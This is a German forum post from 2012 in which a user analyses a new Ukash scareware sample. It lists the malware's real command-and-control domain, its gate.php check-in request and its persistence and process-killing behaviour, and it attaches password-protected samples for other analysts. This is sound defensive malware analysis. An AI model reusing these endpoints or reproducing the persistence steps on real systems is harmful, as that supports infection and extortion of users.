Einzelnen Beitrag anzeigen

Benutzerbild von Dalai
Dalai

Registriert seit: 9. Apr 2006
1.682 Beiträge
 
Delphi 5 Professional
 
#280

Neue Variante einer Ukash Scareware

  Alt 8. Jul 2012, 02:26
Hab mich ja schon gefreut, dass ich und meine Umgebung bisher von dem Ding verschont wurde. Bis heute, als es meinen Bruder erwischte.

Die bisherige Analyse hat aber ergeben, dass es ein völlig anderes Ding ist, das weder verschlüsselt noch irgendwelche Anstalten macht, Taskmanager und/oder Registry zu sperren. Wenn man die Analyse von VirusTotal (zum Zeitpunkt der Analyse - kurz nach der Infektion - erkannten gerade mal 4 Scanner etwas!) noch mit rein nimmt, liegt nahe, dass es wahrscheinlich eine noch nicht lange in Umlauf befindliche Scareware ist. Auch wenn es hier im Thread konkret um die Trojaner geht, die Daten verschlüsseln, so will ich meine Erkenntnisse hier trotzdem kundtun (außerdem bin ich hier im Forum angemeldet im Gegensatz zum Trojanerboard).

So sieht das Ding aus, wenn es aktiv geworden ist. Das Bild entspricht also keiner der bei bka-trojaner.de abgebildeten Varianten.

Vorwort zur Analyse: Wie das Teil auf den Rechner kam, ist bislang ein Rätsel . Wir vermuten, dass es via Browser (evtl. durch das nicht ganz aktuelle Flash) passierte, können aber in der Chronik desselben keine Seite ausmachen, die dafür verantwortlich gewesen sein könnte. Via Mail fällt definitiv aus, weil am heutigen Tage keine Mails mit Anhängen eingetroffen sind (die eh nicht geöffnet worden wären) und außerdem ein Mailprogramm verwendet wird, das einen eigenen HTML-Renderer hat (The Bat!), sofern man doch mal von der in erster Linie genutzten Textansicht auf HTML-Ansicht umschaltet.

Ein Wort zu den Anhängen:
  • wireshark_filtered.7z ist wie der Name schon sagt ein Mitschnitt mit Wireshark, gelaufen auf infizierten System mit Adminrechten, gefiltert nach der IP des infizierten PCs (ein ungefilterter Mitschnitt ist ebenfalls verfügbar).
  • Logfile1.7z ist ein Mitschnitt der Aktivitäten von Process Monitor (ebenfalls gelaufen mit Adminrechten), gefiltert nach "Category | is | Write". Es existiert auch ein kompletter Mitschnitt ohne diesen Filter, aber da das Teil selbst gepackt ~6 MiB groß ist, hab ich die Sache erstmal gelassen; bei Interesse einfach melden.
  • WSManHTTPConfig.7z enhält die Scareware selbst, geschützt mit dem Passwort "infected". Außerdem wurde die enthaltene EXE so umbenannt, dass sie nicht direkt startbar ist. Bitte trotzdem nur runterladen, wenn man weiß, was man tut und sein Testsystem absichtlich infizieren will!
  • 2104c1be.7z enthält eine Datei ohne Extension, die die Schadware während der Aktivität runterlädt oder erzeugt. Der Name ist dabei zufällig. Was das genau für eine Datei ist, weiß ich nicht, sieht im Lister vom Total Commander aber ähnlich wie eine Executable aus, deshalb ist das Archiv ebenfalls passwortgeschützt.

Die (grobe) Analyse im Detail:
  • Die Datei WSManHTTPConfig.exe kontaktiert einen Server im Netz (#557 und #587 im Wireshark-Log), von dem er eine Nummer bekommt.
  • Nach Kontaktierung des Servers fragt er den DNS nach
    Code:
    fglolituns.in
    (Wireshark #840) und holt sich von ihm
    Code:
    GET /fimage/gate.php?uid={795BAA1E-F792-A0A6-23F5-554C8CCF3BC1}&user=44100100&os=2 HTTP/1.1
    (Wireshark #843), wahrscheinlich, um sich bei seinem C&C zu melden und die Sprache zu ermitteln. Wenn man die komplette URL inkl. der Parameter an ein wget übergibt, bekommt man eine URL zurück, die unter anderem ein "DE" enthält.
  • Anschließend holt er sich das darzustellende Bild von /pic/DETujP.dat (Wireshark #856) und /pic/DEBukF.dat (Wireshark #983)
  • Nach dem Laden der beiden *.dat wird daraus offensichtlich das Bild gebaut (im Verzeichnis %AppData%\hellomoto) und nun geht's richtig los.
  • Die ursprünglich gestartete EXE kopiert sich selbst nach
    Code:
    %LocalAppData%\Microsoft\Windows\*random*\RMActivate_ssp.exe
    , löscht sich vom Ursprungsort [Ergänzung] und trägt sich im Autostart (HKCU) ein [/Ergänzung]. Der Verzeichnisname scheint dabei zufällig zu sein, der Dateiname hingegen nicht.
  • Prozesse werden abgeschossen: explorer.exe und taskmgr.exe
  • wuauclt.exe wird gestartet (zweifach). Die im Archiv befindliche EXE ist also wohl eine DLL, die von wuauclt.exe geladen wird (gesehen hab ich davon nix im Process Explorer, aber vielleicht hab ich was übersehen). Der Prozessor wird übrigens durch die eine Instanz der wuauclt.exe ganz ordentlich belastet (60 bis 70% auf einem Sockel A-System).

Verhaltensanalyse:
  • Jeder Versuch, den Taskmanager zu starten, wird unterbunden (vielleicht auch abgeschossen) und die Scareware bringt sich wieder in den Vordergrund.
  • Nach Töten der wuauclt.exe (die übrigens im Kontext des Nutzers läuft statt wie üblich als SYSTEM), ist die Scareware beendet. Das geht übrigens ganz gut von einem anderen PC aus mit
    Code:
    taskkill.exe /S <infiziertes_System> /U Administrator /IM wuauclt.exe
  • Ohne aktive Netzwerkverbindung kopiert sich die Schadware ins o.g. Verzeichnis und startet wuauclt.exe, diese aber nur in einer einzelnen Instanz und sehen tut man von der Schadware ebenfalls nichts. Selbst, wenn man danach die Netzwerkverbindung reaktiviert, bleibt es bei dieser Situation.
Falls jemandem langweilig sein sollte, kann er sich gerne mit den Anhängen vergnügen und eine genauere Analyse machen . Dieser Beitrag (inkl. der Anhänge) darf auch gerne im Trojanerboard verarbeitet werden. Ich werde das Sample und den Screenshot in jedem Fall an botfrei.de schicken.

MfG Dalai

PS: Ich glaub, das ist einer der längsten jemals von mir verfassten Forenbeiträge, in jedem Fall in diesem Forum .
Angehängte Dateien
Dateityp: 7z 2104c1be.7z (11,3 KB, 1x aufgerufen)
Dateityp: 7z WSManHTTPConfig.7z (32,3 KB, 8x aufgerufen)
Dateityp: 7z wireshark_filtered.7z (231,2 KB, 2x aufgerufen)
Dateityp: 7z Logfile1.7z (99,3 KB, 1x aufgerufen)

Geändert von Daniel (13. Jun 2017 um 07:56 Uhr) Grund: URL auf Wunsch des Autos entfernt
  Mit Zitat antworten Zitat